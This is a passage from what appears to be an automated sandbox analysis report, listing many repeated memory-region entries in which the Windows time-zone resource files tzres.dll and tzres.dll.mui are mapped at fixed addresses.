region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3066
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3067
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3068
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3069
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3070
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3071
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3072
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3073
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3074
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3075
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3076
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3077
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3078
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3079
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3080
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3081
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3082
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3083
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3084
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3085
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3086
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3087
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3088
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3089
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3090
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3091
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3092
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3093
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3094
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3095
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3096
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3097
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3098
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3099
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3100
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3101
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3102
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3103
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3104
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3105
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3106
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3107
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3108
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3109
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3110
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3111
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3112
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3113
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3114
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3115
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3116
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3117
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3118
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3119
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3120
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3121
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3270
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3271
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3272
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3273
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3274
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3275
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3276
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3277
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3278
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3279
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3280
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3281
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3282
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3283
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3284
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3285
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3286
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3287
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3288
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3289
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3290
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3291
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3292
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3293
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3294
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3295
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3296
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3297
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3298
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3299
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3300
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3301
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3302
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3303
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3304
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3305
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3306
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3307
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3308
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3309
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3310
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3311
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3312
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3313
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3314
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3315
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3316
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3317
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3318
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3319
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3320
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3321
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3322
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3323
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3324
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3325
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3326
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3327
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3328
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3329
start_va = 0xab0000
